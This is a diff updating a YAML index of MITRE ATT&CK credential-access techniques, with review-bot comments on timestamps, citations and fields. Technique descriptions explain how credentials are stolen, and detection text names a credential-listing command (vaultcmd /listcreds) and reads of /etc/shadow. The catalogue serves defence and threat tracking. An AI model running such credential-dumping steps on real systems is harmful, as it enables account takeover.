- 'Web Credential: Web Credential Creation'
@@ -46206,8 +46959,8 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
- source_name: GitHub AWS-ADFS-Credential-Generator
description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
- Retrieved December 16, 2020.
- url: https://github.com/damianh/aws-adfs-credential-generator
+ Retrieved September 27, 2024.
+ url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
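Review bot: the `GitHub AWS-ADFS-Credential-Generator` citation now points at `https://github.com/pvanbuijtene/aws-adfs-credential-generator` instead of `https://github.com/damianh/aws-adfs-credential-generator`, while the author credit stays `Damian Hickey`. A repository under a different owner may be a fork whose content diverges from the one originally cited; confirm this URL change mirrors the upstream ATT&CK reference (the new `Retrieved September 27, 2024` date suggests it does) and is not a local edit to the index.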
@@ -46223,11 +46976,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1621:
technique:
- modified: '2024-04-19T04:26:29.365Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication Request Generation
description: |-
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -46238,11 +46990,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Pawel Partyka, Microsoft 365 Defender
- Shanief Webb
- Obsidian Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
logs for suspicious events: unusual login attempt source location, mismatch
@@ -46252,16 +47006,16 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- IaaS
- SaaS
- - Azure AD
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -46299,13 +47053,10 @@ credential-access:
url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.008:
technique:
- modified: '2023-04-11T00:34:00.779Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Chat Messages
description: |-
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -46314,6 +47065,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Douglas Weir
x_mitre_deprecated: false
@@ -46321,11 +47073,11 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -46343,13 +47095,10 @@ credential-access:
url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1212:
technique:
- modified: '2023-10-15T11:45:21.555Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Exploitation for Credential Access
description: |-
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.
@@ -46362,6 +47111,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
- Mohit Rathore
@@ -46375,12 +47125,13 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- - Azure AD
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Process: Process Creation'
@@ -46412,17 +47163,14 @@ credential-access:
url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
- source_name: Microsoft Midnight Blizzard Replay Attack
description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
- Retrieved September 27, 2023.
- url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+ Retrieved September 12, 2024.
+ url: https://x.com/MsftSecIntel/status/1671579359994343425
- source_name: Technet MS14-068
description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
@@ -46495,12 +47243,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1110:
technique:
- modified: '2024-01-29T18:53:26.593Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Brute Force
description: |-
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -46509,6 +47256,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David Fiser, @anu4is, Trend Micro
- Alfredo Oliveira, Trend Micro
@@ -46527,18 +47275,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Command: Command Execution'
@@ -46562,13 +47310,10 @@ credential-access:
url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.004:
technique:
- modified: '2024-03-07T14:28:02.910Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Credential Stuffing'
description: |-
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -46594,6 +47339,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
@@ -46605,18 +47351,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'User Account: User Account Authentication'
@@ -46635,14 +47381,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.004
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -46671,24 +47414,26 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -46723,13 +47468,10 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1187:
technique:
- modified: '2023-08-14T19:30:45.123Z'
+ modified: '2024-10-15T16:33:34.508Z'
name: Forced Authentication
description: |-
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -46807,14 +47549,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Server_Message_Block
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1187
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -46830,6 +47571,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -46838,13 +47580,13 @@ credential-access:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -46852,15 +47594,11 @@ credential-access:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
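Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM, root, User) is removed from T1056 with no replacement field, and `revoked: false` is added. The removal matches the deprecation of that field in the newer ATT&CK spec, but any consumer of this index that filters techniques by required privilege will silently get nothing back; worth one line in the PR description so the behaviour change is discoverable.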
@@ -46871,9 +47609,8 @@ credential-access:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -46919,7 +47656,7 @@ credential-access:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
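Review bot: the `modified` timestamp for T1557.002 moves backwards, from 2022-11-08T14:00:00.188Z to 2022-07-22T18:37:22.176Z, while every other object in this patch moves forward. That is either the source bundle restoring the object's own per-object timestamp in place of a release-wide one, or an older object being picked up; please confirm which before merging, since a regressing `modified` can defeat last-modified based sync logic in downstream tooling.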
@@ -46938,17 +47675,16 @@ credential-access:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
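Review bot: T1557.002 keeps `x_mitre_attack_spec_version: 2.1.0` (context line) while losing `spec_version`, so the object is only partially refreshed compared with its neighbours that move to 3.2.0; together with the regressing `modified` date in the previous hunk this points to the ARP Cache Poisoning entry coming from an older object. The T1556.009 text change from "Azure AD" to "Entra ID" is a straight upstream wording update and is fine.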
@@ -46981,10 +47717,9 @@ credential-access:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
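Review bot: the platform list for T1556.009 loses `Azure AD` and `SaaS` and gains `Identity Provider` (version 1.0 to 1.1). That tracks the ATT&CK platform consolidation, but it changes which per-platform index files this technique lands in; make sure any per-platform CSV/YAML indexes keyed on the old platform names are regenerated in the same change rather than left referencing a platform that no longer appears on the object.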
@@ -47021,11 +47756,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.006:
technique:
- modified: '2023-09-30T20:24:19.357Z'
+ modified: '2024-10-15T14:20:16.722Z'
name: Cloud Secrets Management Stores
description: "Adversaries may acquire credentials from cloud-native secret management
solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47093,34 +47827,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.008:
technique:
- x_mitre_platforms:
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
- type: attack-pattern
- created: '2020-02-11T18:46:56.263Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - url: https://attack.mitre.org/techniques/T1003/008
- external_id: T1003.008
- source_name: mitre-attack
- - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
- File Formats. Retrieved February 19, 2020.
- url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
- source_name: Linux Password and Shadow File Formats
- - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
- unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
- 2020.'
- url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
- source_name: nixCraft - John the Ripper
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-25T20:48:04.491Z'
name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
description: |
Adversaries may attempt to dump the contents of /etc/passwd
and /etc/shadow
to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd
and /etc/shadow
to store user account information including password hashes in /etc/shadow
. By default, /etc/shadow
is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -47129,20 +47839,42 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd
and /etc/shadow
, alerting on the pid,
process name, and arguments of such programs.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+ created: '2020-02-11T18:46:56.263Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/008
+ external_id: T1003.008
+ - source_name: Linux Password and Shadow File Formats
+ description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+ File Formats. Retrieved February 19, 2020.
+ url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+ - source_name: nixCraft - John the Ripper
+ description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+ unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+ 2020.'
+ url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.008
atomic_tests: []
T1558.002:
@@ -47174,7 +47906,7 @@ credential-access:
from Memory. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
source_name: Medium Detecting Attempts to Steal Passwords from Memory
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T21:46:46.831Z'
name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
description: |-
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
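Review bot: `modified` for T1558.002 (Silver Ticket) regresses from 2021-04-29T14:49:39.188Z to 2020-03-25T21:46:46.831Z, the same pattern as T1557.002 above; check this object against the upstream bundle before merging.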
@@ -47200,13 +47932,11 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.002
atomic_tests: []
T1555.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:44:35.906Z'
name: 'Credentials from Password Stores: Windows Credential Manager'
description: |-
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
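Review bot: T1558.002 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` without gaining a replacement `x_mitre_attack_spec_version: 3.2.0`, and it keeps `x_mitre_permissions_required: - User` that is stripped from the other objects in this patch. Combined with the regressed `modified` date, the Silver Ticket object appears to be sourced differently from the rest; either refresh it from the same bundle or say in the PR why it diverges.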
@@ -47223,24 +47953,24 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Bernaldo Penas Antelo
+ - Mugdha Peter Bansode
+ - Uriel Kosayev
+ - Vadim Khrykov
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor process and command-line parameters of vaultcmd.exe
for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”
).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as CredEnumerateA
that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\
, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bernaldo Penas Antelo
- - Mugdha Peter Bansode
- - Uriel Kosayev
- - Vadim Khrykov
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -47281,36 +48011,13 @@ credential-access:
url: https://www.passcape.com/windows_password_recovery_vault_explorer
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.004
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -47331,6 +48038,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -47345,52 +48053,42 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
